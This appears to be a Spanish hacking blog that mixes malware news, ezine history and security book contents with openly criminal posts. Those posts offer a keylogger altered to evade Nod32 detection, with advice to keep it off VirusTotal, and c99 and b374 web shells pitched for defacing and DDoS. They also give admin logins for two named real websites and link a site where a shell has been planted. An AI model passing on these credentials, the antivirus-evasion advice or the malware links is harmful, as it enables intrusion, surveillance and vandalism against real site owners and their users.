Limpiando keylogger


Este keylogger es muy viejo pueden ver en la descripción del video  que se subió hace como 4 años lo he estado modeando y le quite la firma del Nod32 para mi sorpresa salieron varias firmas jeje.




Descargar original:

http://www.mediafire.com/download/cb7wdy39p6q59y4/Keylogger.zip

Escaneado en  virustotal por que ya es antiguo  cuando un malware es nuevo y esta  limpio no se pasa por virustotal por distribuye muestras y a los dias seria detectado.

https://www.virustotal.com/es/file/6770713ac4566984c60c2c3dda72cbc57368aa0f142bd47d57bc210b77f1947f/analysis/1419521794/


La firma del Nod32 se encuentra entre los offset 7000-7010 eso es lo que yo utilize hay otros que también son funcionales



Pagina que no  distribuye muestras, espero que no lo pasen por virustotal si no se quemaría rápido.



Descargar Limpio:

http://www.mediafire.com/download/hhb1d2w2j44i6qo/LogLimpio.rar

Practical Cryptography Algorithms and Implementations Using C++





Código:
Contents
Preface ix
Acknowledgments xi
About the Editors xiii
Contributors xvii
Chapter 1 B asics of Security and Cryptography 1
AL-SAKIB KHAN PATHAN
Chapter 2 C lassical Cryptographic Algorithms 11
SHEIKH SHAUGAT ABDULLAH AND SAIFUL AZAD
Chapter 3 R otor Machine 35
SHEIKH SHAUGAT ABDULLAH AND SAIFUL AZAD
Chapter 4 B lock Cipher 45
TANVEER AHMED, MOHAMMAD ABUL KASHEM,
AND SAIFUL AZAD
Chapter 5 D ata Encryption Standard 57
EZAZUL ISLAM AND SAIFUL AZAD
Chapter 6 A dvanced Encryption Standard 91
ASIF UR RAHMAN, SAEF ULLAH MIAH, AND
SAIFUL AZAD
viii Contents
Chapter 7 A symmetric Key Algorithms 127
NASRIN SULTANA AND SAIFUL AZAD
Chapter 8 T he RSA Algorithm 135
SAAD ANDALIB AND SAIFUL AZAD
Chapter 9 E lliptic Curve Cryptography 147
HAFIZUR RAHMAN AND SAIFUL AZAD
Chapter 10 M essage Digest Algorithm 5 183
BAYZID ASHIK HOSSAIN
Chapter 11 S ecure Hash Algorithm 207
SADDAM HOSSAIN MUKTA AND SAIFUL AZAD
Chapter 12 F undamentals of Identity-Based
Cryptography 225
AYMEN BOUDGUIGA, MARYLINE LAURENT, AND
MOHAMED HAMDI
Chapter 13 S ymmetric Key Encryption Acceleration
on Heterogeneous Many-Core
Architectures 251
GIOVANNI AGOSTA, ALESSANDRO BARENGHI,
GERARDO PELOSI, AND MICHELE SCANDALE
Chapter 14 M ethods and Algorithms for Fast
Hashing in Data Streaming 299
MARAT ZHANIKEEV

Descargar:



Malware que ataca sistemas de banca online

Una nueva e importante amenaza de malware dirigido a sistemas de banca en línea y a sus clientes ha sido detectada por los analistas de seguridad de Kaspersky Lab. Identificado como una evolución del Troyano Zeus, Trojan-Banker.Win32.Chthonic, o Chthonic para abreviar, se sabe que ha afectado a más de 150 bancos diferentes y 20 sistemas de pago en 15 países, y parece estar destinado principalmente a atacar a instituciones financieras en el Reino Unido, España, Estados Unidos, Rusia, Japón e Italia.






Aunque Chthonic aún no ha sido detectado en Latinoamérica, Dmitry Bestuzhev, director del equipo de investigación y análisis para Kaspersky Lab América Latina, piensa que su aparición en la región es solo una cuestión de tiempo. “Como lo hemos visto antes con otras amenazas, anticipamos que Chthonic se expandirá hacia nuestra región pero de la mano de cibercriminales locales que adoptarán las técnicas o comprarán las tecnologías de los que están detrás de este malware para difundirlo a nivel regional. Dichos esquemas de delinquir son muy populares en nuestra región e inclusive, se han utilizado hasta con el mismo troyano bancario Zeus”, señaló.

Chthonic aprovecha funciones de las computadoras como la cámara web y el teclado para robar credenciales bancarias en línea tales como contraseñas guardadas. Los atacantes también pueden conectarse a la computadora de forma remota y ordenarle que lleve a cabo las transacciones.

Sin embargo, el arma principal de Chthonic es la inyección vía web. Esto permiten al Troyano insertar su propio código e imágenes en las páginas del banco que carga el navegador de la computadora, lo que le permite a los atacantes obtener el número de teléfono de la víctima, las contraseñas de un solo uso y números PIN, así como los detalles de inicio de sesión y contraseña introducidos por el usuario.

Las víctimas se infectan a través de enlaces web o archivos adjuntos de correo electrónico que contienen un documento con la extensión .DOC el cual establece una “puerta trasera” para el código malicioso. El archivo adjunto contiene un documento RTF especialmente diseñado para aprovechar la vulnerabilidad CVE-2014-1761 en productos de Microsoft Office.

Una vez descargado, el código malicioso que contiene un archivo de configuración cifrado se inyecta en el proceso msiexec.exe y se instalan varios módulos maliciosos en la máquina.

Hasta ahora Kaspersky Lab ha descubierto módulos que pueden recoger información del sistema, robar contraseñas guardadas, registrar teclas pulsadas, permitir el acceso remoto, y grabar vídeo y sonido a través de la cámara web y el micrófono, en caso que la computadora incluya esas funciones.

En el caso de uno de los bancos japoneses atacados, el malware es capaz de ocultar las advertencias del banco e inyectar, en cambio, un script que permite a los atacantes realizar diversas transacciones utilizando la cuenta de la víctima.

Los clientes afectados de los bancos rusos son recibidos por páginas bancarias totalmente fraudulentas tan pronto como inician la sesión. Esto se logra mediante el Troyano que crea un iframe con una copia de phishing del sitio web que tiene el mismo tamaño que la ventana original.

Chthonic comparte algunas similitudes con otros Troyanos. Utiliza el mismo archivo cifrador y de descarga que Andrómeda, el mismo esquema de cifrado que los Troyanos Zeus AES y Zeus V2, así como una máquina virtual similar a la usada en ZeusVM y el malware KINS.

Afortunadamente, muchos fragmentos del código utilizado por Chthonic para realizar inyecciones web ya no se pueden utilizar, debido a que los bancos han cambiado la estructura de sus páginas y, en algunos casos, también los dominios.

“El descubrimiento de Chthonic confirma que el Troyano ZeuS sigue evolucionando. Los autores de malware están haciendo pleno uso de las técnicas más modernas, auxiliados considerablemente por la filtración del código fuente de ZeuS. Chthonic es la siguiente fase en la evolución de ZeuS. Utiliza el cifrado de Zeus AES, una máquina virtual similar a la utilizada por ZeusVM y KINS, y el descargador de Andrómeda – para atacar cada vez más instituciones financieras y a sus clientes inocentes de formas cada vez más sofisticadas. Creemos que sin duda aparecerán nuevas variantes de ZeuS en el futuro, y nosotros continuaremos rastreando y analizando cualquier amenaza para mantenernos un paso por delante de los ciberdelincuentes”, dijo Yury Namestnikov, Analista Senior de Malware en Kaspersky Lab y uno de los investigadores que trabajó en la investigación de la amenaza.


Fuente:portinos.com

2 Shell Up


Les dejo dos shell  la c99shell 1.0 y b374 2.8  para defacear o hacer un ataque ddos solo agregen sus victimas :) hay que subirla en el servidor de la web hackeada.







Descargar:



Login Admin Hackeado




Para subir shell no modifiquen nada -_-

Web

Login Admin

http://www.embroidered-printed-clothing.co.uk/login.php

Username: Justin
Password: jlcb599516


http://vecinitas.com.ve/admin/login.php

Usuario: luis
Contraseña: 12345

Thanks 12Glitch13

¿Quién es la “Barbie Hacker Feminista”?





Entre los miles de productos de Barbie que existen en este planeta está un libro ilustrado que lleva como título Barbie: I Can be a Computer Engineer (traducido es algo como Barbie: yo puedo ser una ingeniera en computación). Dicho libro ha recibido montones de críticas en Internet por tratarse de un contenido que –ante la percepción de muchos– utiliza el estereotipo de la forma en que las mujeres supuestamente entienden (o más bien no entienden) la industria tecnológica.

En el libro, Barbie le pide ayuda a sus dos amigos hombres para arreglar problemas o completar proyectos, infecta la computadora de su hermana y dice cosas como “Yo sólo estoy haciendo las ideas de diseño”. Algo dudoso para un libro que se supone debe inspirar a las niñas, ¿no? Ofensivo o no, ante este material surgió una divertida respuesta en Internet: memes de “Feminist Hacker Barbie”.

Esta Barbie Hacker Feminista fue idea de una programadora californiana llamada Kathleen, pues ante la frustración que sintió al ver el libro, creó un sitio para que la gente vuelva a escribir las páginas con cosas que no hacen quedar a Barbie como una inútil que obtiene crédito por cosas que no hizo. Las imágenes originales son perfectas para editar porque en realidad no tienen sentido y quedan casi con cualquier frase genuinamente geek que se les pueda ocurrir.

Aquí les dejamos algunos de los memes más divertidos; si quieren hacer los suyos, simplemente visiten el sitio creado por Kathleen.









… Y aquí un ejemplo de alguien aún mejor que la Barbie Hacker Feminista.


Fuente:unocero.com


¿Dónde aprendieron los 'hackers' a ser 'hackers'? (IV)




Internet ha cambiado en los últimos veinte años, pero no tanto como podría parecer. Si miramos de cerca su código, cual Matrix, vemos que muchas cosas siguen siendo en esencia las mismas, sólo han mutado las herramientas: lo que antes era una BBS hoy sería, salvando las distancias, Facebook. Y Twitter, una mezcla de chat y lista de correo personalizada. En cuanto a las revistas electrónicas o 'ezines', tendrían la función que hoy tiene un blog. Y, así como no hay prácticamente colectivo en Internet que hoy no tenga su 'blog', tampoco en los años 90 había prácticamente grupo de 'hackers' que no tuviese su propia 'ezine': 29A, JJF.. e incluso revistas sin grupo, como NetSearch y 7a69ezine.



Aparte de las más conocidas en la escena hacker española, SET yRaregazz, otras ezines ofrecían la suficiente calidad para ser recordadas. La mayoría pueden leerse aún, o descargarse, en repositorios como Govannom, Austistici o la Comunidad Underground de México. En este último sitio se almacenan las principales ezines de los viejos grupos 'hacker' mexicanos, entre ellos Raza Mexicana, RTM y Mexican Hackers Mafia. Pegarles un vistazo puede llenar un sábado tarde o noche aburrido pues junto al tema técnico, que es el que echa más para atrás al lego, hay textos filosóficos que enseñan mucho sobre la cultura 'hacker', también textos de humor e incluso política.

Entre las 'ezines' interesantes hechas desde España, que no en castellano (en inglés), destaca la del grupo 29A, el mejor colectivo 'hacker' que hayamos visto por estas tierras. Su pericia como programadores de virus los catapultó a la escena internacional, que lideraron, y pronto se les unió gente de toda Europa, aunque el liderazgo fue siempre español. Su 'ezine' se conserva en su página web. Otra ezine destacable fue la del grupo JJF Hackers Team conocidos por ser los primeros que usaron el término "hacker blanco" en España y también por haber montado la NoConName. La revista aparece en 1997, con colaboradores de lujo como Nobody e IPgh0st.





Una ezine más peculiar fue la del grupo CatHack, la única escrita en catalán, que aparece a finales de 1998. Su editor era Pop.tPH, hoy conocido como @trufae, autor de Radare, una "suite" de programas para la ingeniería inversa famosa a nivel internacional. El resto del equipo fundador lo formaban Barner, Asef y PGB. CatHack era una de las pocas ezines hackers que, junto con Raregazz, se declaraba abiertamente hacktivista. Otra ezine para el recuerdo fue la del grupo Disidents (http://hackstory.net/Disidents), que llegó a los ocho números aunando colaboradores de ambos lados del Atlántico.

En 1999 nace la ezine NetSearch, a iniciativa de Ulandron, del grupoUndersec. Pero NetSearch no será la típica revista de grupo: en ella escribirán miembros de Undersec y también habituales del canal de chat #netsearch: DarK_FeaR, Sp4rc, cafo, [LsD]-MT, Raise, }Moeb|uZ{, Quasar, P0p3, Hander, kekabron, Chui, Hardcode, GamerX, P0TH, Freedom, HuFaKLF, extremoduro, |anillo|, Chapulino, Maniac o el malogrado Doing. Hoy el proyecto Netsearch sigue en pie (http://www.netsearch-ezine.net) gracias a MegadetH.

También en 1999 aparece 7a69ezine, de la mano de Ripe y que llegará a la friolera de 14 números, con colaboraciones de conocidos hackers como |CoDeX|, Doing, Tahum, OverDrive, tuxisuau, Bruj0, Iam, Pluf, Pancake, QuasaR o esn-min. En ella pueden leerse, entre otras, las crónicas del fin de la escena hacker de los 90, como un artículo firmado por el 'staff' en 2002:


"¿Panorama del under actual? Pues que decir, de momento sigue como siempre bastante parado, al menos de cara al publico. SET parece que se ha estabilizado; ha superado la torta que les dieron y el pobre número #25 anunciando la salida de un próximo numero que debería salir a finales de Octubre. NetSearch sigue siendo una incógnita total, tras anunciar su retirada y su vuelta en alguna ocasión parece que la ultima palabra manifiesta un retorno de estos, tendremos que esperar a ver que pasa. Otros 'ezines', como DTF, parece que no acaban de despegar del todo (sabemos que los inicios, e incluso el mantenerse, son muy complicados, Animos!). En cuanto a Hispahack, basta con decir que la web sigue prácticamente igual que cuando la inauguraron, con la diferencia de la actividad en los foros (que ha disminuido), foros que tuvieron que cerrar durante unos días debido a una vulnerabilidad en los mismos. Esperamos ver pronto buen trabajo de todos ellos"


Tres años antes, otro artículo en 7a69ezine explica cuáles son los principales canales de chat que sirven de punto de reunión de la escena 'hacker' española e hispana. Y es que si las 'ezines' eran los libros de texto de los 'hackers', las salas de 'chat' eran sus aulas. Sobre el 'chat' versará la siguiente entrega de esta serie.

Fuente:elmundo.es



¿Dónde aprendieron los 'hackers' a ser 'hackers'? (III)



Imagine cómo aprendería usted algo que está sucediendo ahora mismo, para lo que no hay maestros ni medios de comunicación de masas que lo retransmitan, y cuyo conocimiento está sólo al alcance de una élite. Un importante paso, posiblemente, sería unirse a otros para ayudarse mutuamente. De esta manera cada uno o una podría especializarse en una cosa y enseñarla al resto. Lo siguiente sería crear las plataformas adecuadas para que cuanta más gente posible pudiese acceder al nuevo conocimiento. Esto sucedió en los años 90 del siglo pasado con las nuevas tecnologías. Y una de las plataformas que aquellos 'hackers' ansiosos, estudiantes adictos, más usaron fueron los boletines electrónicos o 'ezines'. Seguimos.


Hablábamos la semana pasada de la 'ezine' Saqueadores Edición Técnica, nacida en Murcia, uno de los principales exponentes de esta forma de comunicación y educación en lengua castellana. Pero hubo más. Junto a "Saqueadores" brilla también RaregaZz, creada en México por alguien apodado Raretrip. Raregazz aglutinó a 'hackers' de ambos lados del charco, con un potente núcleo español, y se ganó el respeto de la comunidad por la calidad de sus artículos. El principal artífice de ello fue el alicantino Guybrush, quien cogió el timón de la'ezine' a finales de 1997.




Raregazz nació en febrero de 1997 y publicó 19 números, hasta 2002, lo que es todo un récord en un contexto donde las 'ezines'no solían pasar de los 5 números. Se distribuía a través de una lista de correo y posteriormente en el sitio web oficial, que cambió diversas veces de sitio. Guybrush explica por qué: "Costaba mucho encontrar alojamiento gratuito y además estaba bastante vetado todo el contenido de 'hacking'". Actualmente pueden visitarse fragmentos de la web de Raregazz gracias al sitio Archive.org: enhttp://web.archive.org/web/*/http://raregazz.acapulco.uagro.mx/* yhttps://web.archive.org/web/20040519045649/http://www.raregazz.org/. Además, la 'ezine' puede consultarse completa en diversas bases de datos, como Govannom o el servidor italiano Autistici.

Del fundador de Raregazz, Raretrip, hay muy poca información, excepto que era mexicano y políticamente comprometido. Según contaba él mismo en el primer número, su intención al crear la 'ezine'era liberar la información sobre 'hacking' de los nichos "elitistas". Además, le interesaba mucho el hacktivismo y cómo este podía ayudar a la lucha zapatista, entonces en pleno apogeo. Así lo explicaba en el texto "Requiem para RareGaZz", tres años después de fundar la revista: "Creiamos que encontrariamos dentro de esta zona llamada internet la utopia que Marx no pudo en la "realidad". Creimos eso y nos valio incluir textos sobre filosofia (...) y muchas otras materias que nada tenian que ver con la escena hacker excepto el tratar de crear conciencia usando como instrumento a la tecnologia. Funcionó".

Otro punto que distingue a esta 'ezine' es la mezcolanza de nacionalidades que pasaron por ella, como explica uno de sus últimos editores, el peruano Alonso ReYDeS: "Empieza como un grupo mexicano y termina siendo un grupo Latinoamericano o Hispano, dado que teníamos miembros de México, Argentina, Bolivia, Uruguay, Perú, España y Chile. El coordinar las reuniones vía chat era un poco complicado, dado que hablamos de gente en España y Latinoamérica. Había que encontrar horas que la gente estuviera lúcida y coordinar horarios para reuniones de casi el 100% de integrantes algunas veces era imposible".

En los primeros números escribían sólo RareTrip y KillerBot. Más adelante se les unieron Le PompeItor, Mr. X y, como colaboradores,Serverhacker, Raven Spirit, DuvaHazard, Dark Raver, Psycho Tranze, sir francis drake, Cracksmoker, Arkangel, Orion, Groovy, Carlos Truco, Yo, TucanX y NiK. La ezine, como muchas otras en su infancia, publicaba desde tutoriales básicos de hacking hasta humor y textos anarquistas. En aquellos primeros tiempos Raregazz se integraba dentro del grupo Red del Kaos, cuyo líderCrackSmoker escribía: "Somos un grupo de terroristas -si asi es- encargados de causar KaoS en los sistemas mexicanos reclamando democracia, libertad política y sobre todo una mayor apertura a los grupos sociales como Rdk en los medios de comunicación para transmitir nuestras ideas".

Era típico de las 'ezines' 'hacker' que en sus inicios se publicasen muy seguido, cada mes o incluso antes, para después alargar los periodos entre número y número y aparecer una vez al año o de forma mucho más irregular. Raregazz llevaba 7 números y aún estábamos en 1997 cuando Guybrush escribió su primer artículo. Guybrush es el primer español que entra en el equipo editorial y con él se inicia el desembarco español en la revista, que consolida su apertura al hacking más técnico. Con Guybrush llegarán colaboraciones de grupos de aquí como Underhack, JJF Hackers Team o TDD y un elevado número de colaboradores: Pata, Azumlord, Yo_Soy (quien más adelante se unirá al grupo Raza Mexicana), VoraX, 12r43lOverdrive, Nobody (uno de los organizadores de la primeraNoConName en Mallorca), Sebastián Quiroga, SlimeLORD, O'Flaherty, Senpai, Lobo, Ironbox, Cytorax, Mr.Nexus, Barbwired, Freedom, ZeD y un largo etcétera.

Entre 1998 y 2000 Raregazz vive su momento más fecundo. Pero en marzo de 2001 Guybrush anuncia, en la 'ezine' NetSearch, que abandona el barco por "diferencias con el resto". Guybrush se queja de que "la gente de ahora es demasiado cool y nada más que quiere ser conocido y pertenecer a un grupo bueno pero nadie quiere trabajar (...). Supongo que raregazz ha muerto. Nadie tiene ganas de trabajar, tan solo quieren aparentar, tomar decisiones y mandar pero sin hacer nada a cambio". El último equipo editorial en el que aparece Guybrush lo forman él mismo, Raretrip, Alt3kx_h3z, enan0, y0ni, Yo_Soy, ReYDeS, Ocsic, Cytorax y ^Shadown^. Un año después, el 27 de marzo de 2002, aparece el último número.

Cabe destacar de Raregazz que la calidad técnica no estuvo reñida con su compromiso 'hacktivista': desde los primeros números, cuando se convoca un 'ciberataque' contra el Instituto Federal Electoral mexicano; hasta los últimos, cuando se da voz al principal grupo 'hacktivista' mexicano, X-Ploit. Después de la fiestas navideñas de 1997, Raregazz reproduce íntegramente el famoso 'Comunicado del EZLN sobre la guerra en Chiapas México' que sacude al primer mundo. De hecho, sospecha Guybrush, Raretrip y sus amigos podrían haberse ido de Raregazz para formar parte de X-Ploit: "En mi opinión lo de los fundadores creo que era más una lucha política y por esa época había otro grupo mexicano sin web pero bastante activo y conocido por atacar páginas del gobierno mexicano (X-ploit team)...raro es que todos desaparecieran de golpe".

Fuente:elmundo.es

Shell gratis





Aquí les regalo esta web con shell para que suban sus shell booter o lo que quieran, si quieren pueden defacear xD
Autor:12Glitch13



Deface web con shell

http://www.lacoloniadigital.com.uy/noticias/12Glitch13.php

Web original

http://www.lacoloniadigital.com.uy

PERUHACK 2014

Expertos y ponentes del próximo evento PERUHACK 2014, en Lima, responden sobre los conocimientos y capacidades necesarios para ser denominado “hacker”.





detalles técnicos.

LAS EMPRESAS ESTÁN EN PELIGRO

“No hay el conocimiento suficiente dentro de las personas en las organizaciones respecto a los problemas de seguridad (informática)”, señala Walter Cuestas, Gerente de Open Sec y experto en Hacking Ético. “Aunque la información es abundante con respecto a cómo se llevan a cabo los ataques (de hackers) no es algo que se difunda tanto”.

“Si uno comienza a hacer testing (pruebas) en una compañía, va a encontrar ‘X’ fallas en su sistema que cualquier profesional del hacking va a poder vulnerar”, acota Miguel Torres, quien asegura que las empresas se encuentran en bastante peligro si no toman conciencia de las capacidades de los hackers actualmente.

Así, ambos expertos concuerdan en que se tiene que conocer mejor sobre cómo se lleva la “seguridad ofensiva” que la “seguridad defensiva”. Es decir, las compañías deben saber cómo atacan los hackers primero; para después analizar las protecciones que pueden establecer.

Acerca de PERUHACK 2014

Es un evento de in-seguridad informática y hacking en Perú dedicado por completo a mostrar técnicas de hacking, computación forense y seguridad ofensiva.

Contará con la participación de reconocidos hackers peruanos y extranjeros, y se realizará esteviernes 21 de noviembre en el campus de la UPC de Monterrico. Para más información acerca de los ponentes y detalles del evento, puedes ingresar a su página web.

Fuente: peru.com

Proxy List 05.11.14 + Vip Socks 5





Un proxy es un programa o dispositivo que realiza una tarea acceso a Internet en lugar de otro ordenador. Un proxy es un punto intermedio entre un ordenador conectado a Internet y el servidor que está accediendo. Cuando navegamos a través de un proxy, nosotros en realidad no estamos accediendo directamente al servidor, sino que realizamos una solicitud sobre el proxy y es éste quien se conecta con el servidor que queremos acceder y nos devuelve el resultado de la solicitud.


Descargar Proxy List

Kali Linux Network Scanning Cookbook




Table of Contents
Preface 1
Chapter 1: Getting Started 7
Configuring a security lab with VMware Player (Windows) 7
Configuring a security lab with VMware Fusion (Mac OS X) 13
Installing Ubuntu Server 16
Installing Metasploitable2 20
Installing Windows Server 22
Increasing the Windows attack surface 24
Installing Kali Linux 27
Configuring and using SSH 31
Installing Nessus on Kali Linux 35
Configuring Burp Suite on Kali Linux 39
Using text editors (VIM and Nano) 42
Chapter 2: Discovery Scanning 45
Using Scapy to perform layer 2 discovery 49
Using ARPing to perform layer 2 discovery 58
Using Nmap to perform layer 2 discovery 63
Using NetDiscover to perform layer 2 discovery 66
Using Metasploit to perform layer 2 discovery 69
Using ICMP ping to perform layer 3 discovery 73
Using Scapy to perform layer 3 discovery 78
Using Nmap to perform layer 3 discovery 87
Using fping to perform layer 3 discovery 90
Using hping3 to perform layer 3 discovery 94
Using Scapy to perform layer 4 discovery 100
Using Nmap to perform layer 4 discovery 111
Using hping3 to perform layer 4 discovery 115
ii
Table of Contents
Chapter 3: Port Scanning 125
UDP port scanning 126
TCP port scanning 126
UDP scanning with Scapy 129
UDP scanning with Nmap 136
UDP scanning with Metasploit 140
Stealth scanning with Scapy 145
Stealth scanning with Nmap 153
Stealth scanning with Metasploit 160
Stealth scanning with hping3 167
Connect scanning with Scapy 170
Connect scanning with Nmap 178
Connect scanning with Metasploit 184
Connect scanning with Dmitry 192
TCP port scanning with Netcat 195
Zombie scanning with Scapy 199
Zombie scanning with Nmap 204
Chapter 4: Fingerprinting 209
Banner grabbing with Netcat 211
Banner grabbing with Python sockets 213
Banner grabbing with Dmitry 217
Banner grabbing with Nmap NSE 220
Banner grabbing with Amap 221
Service identification with Nmap 224
Service identification with Amap 226
Operating system identification with Scapy 230
Operating system identification with Nmap 237
Operating system identification with xProbe2 238
Passive operating system identification with p0f 241
SNMP analysis with Onesixtyone 244
SNMP analysis with SNMPwalk 245
Firewall identification with Scapy 247
Firewall identification with Nmap 262
Firewall identification with Metasploit 264
Chapter 5: Vulnerability Scanning 269
Vulnerability scanning with Nmap Scripting Engine 270
Vulnerability scanning with MSF auxiliary modules 276
Creating scan policies with Nessus 280
iii
Table of Contents
Vulnerability scanning with Nessus 283
Command-line scanning with Nessuscmd 288
Validating vulnerabilities with HTTP interaction 291
Validating vulnerabilities with ICMP interaction 293
Chapter 6: Denial of Service 297
Fuzz testing to identify buffer overflows 298
Remote FTP service buffer overflow DoS 302
Smurf DoS attack 305
DNS amplification DoS attack 309
SNMP amplification DoS attack 320
NTP amplification DoS attack 330
SYN flood DoS attack 332
Sock stress DoS attack 339
DoS attacks with Nmap NSE 344
DoS attacks with Metasploit 348
DoS attacks with the exploit database 354
Chapter 7: Web Application Scanning 359
Web application scanning with Nikto 360
SSL/TLS scanning with SSLScan 363
SSL/TLS scanning with SSLyze 366
Defining a web application target with Burp Suite 369
Using Burp Suite Spider 371
Using Burp Suite engagement tools 373
Using Burp Suite Proxy 375
Using the Burp Suite web application scanner 376
Using Burp Suite Intruder 378
Using Burp Suite Comparer 381
Using Burp Suite Repeater 382
Using Burp Suite Decoder 386
Using Burp Suite Sequencer 387
GET method SQL injection with sqlmap 390
POST method SQL injection with sqlmap 394
Requesting a capture SQL injection with sqlmap 397
Automating CSRF testing 399
Validating command injection vulnerabilities with HTTP traffic 402
Validating command injection vulnerabilities with ICMP traffic 404
iv
Table of Contents
Chapter 8: Automating Kali Tools 407
Nmap greppable output analysis 407
Nmap port scanning with targeted NSE script execution 410
Nmap NSE vulnerability scanning with MSF exploitation 413
Nessuscmd vulnerability scanning with MSF exploitation 416
Multithreaded MSF exploitation with reverse shell payload 419
Multithreaded MSF exploitation with backdoor executable 422
Multithreaded MSF exploitation with ICMP verification 424
Multithreaded MSF exploitation with admin account creation 426
Index 429


Descargar:



Kali Linux CTF Blueprints





Table of Contents
Preface 1
Chapter 1: Microsoft Environments 7
Creating a vulnerable machine 8
Securing a machine 8
Creating a secure network 9
Basic requirements 9
Setting up a Linux network 9
Setting up a Windows network 9
Hosting vulnerabilities 10
Scenario 1 – warming Adobe ColdFusion 11
Setup 11
Variations 14
Scenario 2 – making a mess with MSSQL 15
Setup 15
Variations 19
Scenario 3 – trivializing TFTP 20
Vulnerabilities 21
Flag placement and design 22
Testing your flags 22
Making the flag too easy 23
Making your finding too hard 24
Alternate ideas 24
Post exploitation and pivoting 25
Exploitation guides 26
Scenario 1 – traverse the directories like it ain't no thing 26
Scenario 2 – your database is bad and you should feel bad 29
Scenario 3 – TFTP is holier than the Pope 33
Challenge modes 34
Summary 35
Table of Contents
[ ii ]
Chapter 2: Linux Environments 37
Differences between Linux and Microsoft 38
Setup 38
Scenario 1 – learn Samba and other dance forms 38
Setup 39
Configuration 40
Testing 41
Variations 42
Information disclosure 42
File upload 42
Scenario 2 – turning on a LAMP 42
Setup 43
The PHP 43
Variations 45
Out-of-date versions 45
Login bypass 45
SQL injection 46
Dangerous PHP 46
PHPMyAdmin 47
Scenario 3 – destructible distros 47
Setup 47
Variations 48
Scenario 4 – tearing it up with Telnet 48
Setup 49
Variations 50
Default credentials 50
Buffer overflows 51
Flag placement and design 51
Exploitation guides 51
Scenario 1 – smashing Samba 51
Scenario 2 – exploiting XAMPP 53
Scenario 3 – liking a privilege 57
Scenario 4 – tampering with Telnet 57
Summary 59
Chapter 3: Wireless and Mobile 61
Wireless environment setup 62
Software 62
Hardware 63
Scenario 1 – WEP, that's me done for the day 64
Code setup 64
Network setup 67
Table of Contents
[ iii ]
Scenario 2 – WPA-2 69
Setup 69
Scenario 3 – pick up the phone 71
Setup 71
Important things to remember 72
Exploitation guides 72
Scenario 1 – rescue the WEP key 72
Scenario 2 – potentiating partial passwords 73
Scenario 3.1 – be a geodude with geotagging 74
Scenario 3.2 – ghost in the machine or man in the middle 76
Scenario 3.3 – DNS spoof your friends for fun and profit 78
Summary 80
Chapter 4: Social Engineering 81
Scenario 1 – maxss your haxss 82
Code setup 82
Scenario 2 – social engineering: do no evil 86
Setup 86
Variations 87
Scenario 3 – hunting rabbits 88
Core principles 88
Potential avenues 90
Connecting methods 91
Creating an OSINT target 93
Scenario 4 – I am a Stegosaurus 94
Visual steganography 94
Exploitation guides 96
Scenario 1 – cookie theft for fun and profit 96
Scenario 2 – social engineering tips 97
Scenario 3 – exploitation guide 98
Scenario 4 – exploitation guide 100
Summary 101
Chapter 5: Cryptographic Projects 103
Crypto jargon 104
Scenario 1 – encode-ageddon 104
Generic encoding types 104
Random encoding types 105
Scenario 2 – encode + Python = merry hell 106
Setup 106
Substitution cipher variations 107
Table of Contents
[ iv ]
Scenario 3 – RC4, my god, what are you doing? 108
Setup 108
Implementations 110
Scenario 4 – Hishashin 111
Setup 111
Hashing variations 112
Scenario 5 – because Heartbleed didn't get enough publicity as it is 113
Setup 113
Variations 116
Exploitation guides 117
Scenario 1 – decode-alypse now 117
Scenario 2 – trans subs and other things that look awkward in
your history 118
Automatic methods 119
Scenario 3 – was that a 1 or a 0 or a 1? 119
Scenario 4 – hash outside of Colorado 120
Scenario 5 – bleeding hearts 122
Summary 123
Chapter 6: Red Teaming 125
Chapter guide 125
Scoring systems 126
Setting scenarios 127
Reporting 128
Reporting example 129
Reporting explanation 130
CTF-style variations 131
DEFCON game 131
Physical components 131
Attack and defense 132
Jeopardy 133
Scenario 1 – ladders, why did it have to be ladders? 133
Network diagram 134
Brief 135
Setting up virtual machines 136
DMZ 138
missileman 140
secret1 142
secret2 143
secret3 145
Attack guide 147
Variations 153
Table of Contents
[ v ]
Dummy devices 153
Combined OSINT trail 153
The missile base scenario summary 154
Scenario 2 – that's no network, it's a space station 154
Network diagram 154
Brief 156
Setting up a basic network 156
Attack of the clones 157
Customizing cloned VMs 158
Workstation1 158
Workstation2 159
Workstation3 159
Workstation4 159
Workstation5 160
Attack guide 160
Variations 161
The network base scenario summary 162
Summary 162
Appendix 163
Further reading 163
Recommended competitions 165
Existing vulnerable VMs 165
Index

Descargar:

http://www.mediafire.com/download/jiymbiych5dk8k5/Kali_Linux_CTF_Blueprints.rar

¿Dónde aprendieron los 'hackers' a ser 'hackers'? (II)


Todo 'hacker' lleva encima una mochila hecha de cientos, miles de horas de estudio y lectura. Los libros son sus aliados, gruesos libros técnicos donde destaca, desde el principio, la editorial O'Reilly. Pero el mundo de la tecnología cambia tan rápido que el libro solo no puede alcanzarlo: ¿Cómo esperar a que se publique un libro para avisar de un agujero de seguridad, o de la aparición de una nueva versión de un programa? Aquí juegan un papel clave los foros y medios en línea, sean medios de comunicación al uso, blogs, redes sociales, páginas web o las hoy prácticamente desaparecidas 'e-zines' (de 'electronic magazine'), las revistas donde los 'hackers', solos o en grupo, difunden su conocimiento al resto.



La mayoría de 'ezines hacker' españolas aparecieron en la segunda mitad de los 90. La primera de la que se tenga constancia fue "Virtual Zone Magazine". Nació en enero de 1996 y duró cinco números, hasta mayo de 1997. Se hacía desde Granada y su editor era Legion. Versaba sobre temas de interés para programadores, como virus, demos y videojuegos.

1996 sería el año del 'boom' de las primeras 'ezines hacker' españolas, coincidiendo con la aparición de los primeros grupos y el inicio de la construcción de la comunidad. La mayoría no duraron más de 3 números, como 'The Young Hacker of Spain', 'WEB-HACK Magazine', 'CyberHACK' o 'HACK Navigator'. Esta última sólo sacó un número, pero entre sus autores estaban algunos de los apodos punteros de la escena hacker de aquellos años: Warezzman, Homs oGuybrush. Los hackers latinoamericanos les llevaban un año de delantera con 'Minotauro', 'PSYCHO Magazine' o 'YOUTHANASIA'.

Las 'ezines' solían ser archivos de texto plano o, menos, PDF, a veces acompañados del código de algún virus con fines educacionales, todo comprimido en formato '.zip' o '.tar.gz.'. Cuando la compresión se alejaba del típico '.zip' que usaban el común de los usuarios del sistema operativo Windows, se añadía una nueva barrera a quien quería acceder a estos textos, pues además de tener que descubrir dónde estaba la BBS o página web del grupo que publicaba la 'ezine', para poderla descargar, debía también tener los programas adecuados para "desempaquetarla". Estas 'ezines' tenían una periodicidad irregular, más cuanto más tiempo llevaban editándose pues la gente que las publicaba se cansaba o los grupos entraban en decadencia.

